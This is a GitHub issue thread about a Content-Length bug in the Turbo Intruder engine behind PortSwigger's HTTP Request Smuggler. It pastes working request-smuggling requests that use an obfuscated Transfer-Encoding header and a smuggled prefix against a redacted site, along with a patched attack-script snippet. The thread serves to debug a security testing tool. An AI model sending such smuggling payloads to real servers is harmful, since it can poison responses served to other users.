### ISSUE TITLE
Smuggle attack script don't fix the content-length header.

### ISSUE THREAD

**Issue by SbIm** [PortSwigger/http-request-smuggler#5]
When I'm doing a hopefully404 confirm test, the request content-Length will always be the same value as the original request, in my test case it's "Content-Length: 11", but in your demo video I notice that there is a "Content-Length: 44", which has been fixed.

The comment says that "The request engine will auto-fix the content-length for us", maybe something wrong with my settings?

I've already check the update Content-Length feature in both Repeater and Proxy-Options-Intercept Client Requests.

**Comment by albinowax** [comment]
Can you post a screenshot of the request with the incorrect content-length?

**Comment by SbIm** [comment]
From the turbo intruder window, 
The attacker's request is :   
```
POST /zh-cn/ HTTP/1.1
 Transfer-Encoding: chunked
Host: www.redacted.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: //COOKIE HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar

0

GET /hopefully404 HTTP/1.1
X-Ignore: X
```

The simulated victim's request:
```
POST /zh-cn/ HTTP/1.1
 Transfer-Encoding: chunked
Host: www.redacted.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: //COOKIE HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar

0

```
The conten-Length value 11 comes from the request that I right click and choose "Smuggle attack". 
I can change the Content-Length value in turbo intruder window but the change will affect all the requests.

**Comment by SbIm** [comment]
There seems to be a bug of Turbo intruder, when there is a space in the beginning of the line in header area(here is " Transfer-Encoding"), Turbo intruder can't find the following "Content-Length" header string.
This can be fixed by move the "Content-Length" header in front of the space.

For those don't want to change the sequence of these two headers, you can fix the bug in Turbo intruder and compile a new extension, or change the "Content-Length" in the python script.

```
    # The request engine will auto-fix the content-length for us
    t_request = target.req
    t_request = t_request.replace("Content-Length: 11", "Content-Length: 44")
    attack = t_request + prefix
    engine.queue(attack)

    t_request = t_request.replace("Content-Length: 44", "Content-Length: 5")
    victim = t_request
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)
```

**Comment by albinowax** [comment]
Thanks for the high-quality report! I'll look into doing a release with a patched turbo-intruder.

**Comment by albinowax** [comment]
I've patched this in Turbo Intruder, and the version bundled with HTTP Request Smuggler will be updated in the BApp store shortly
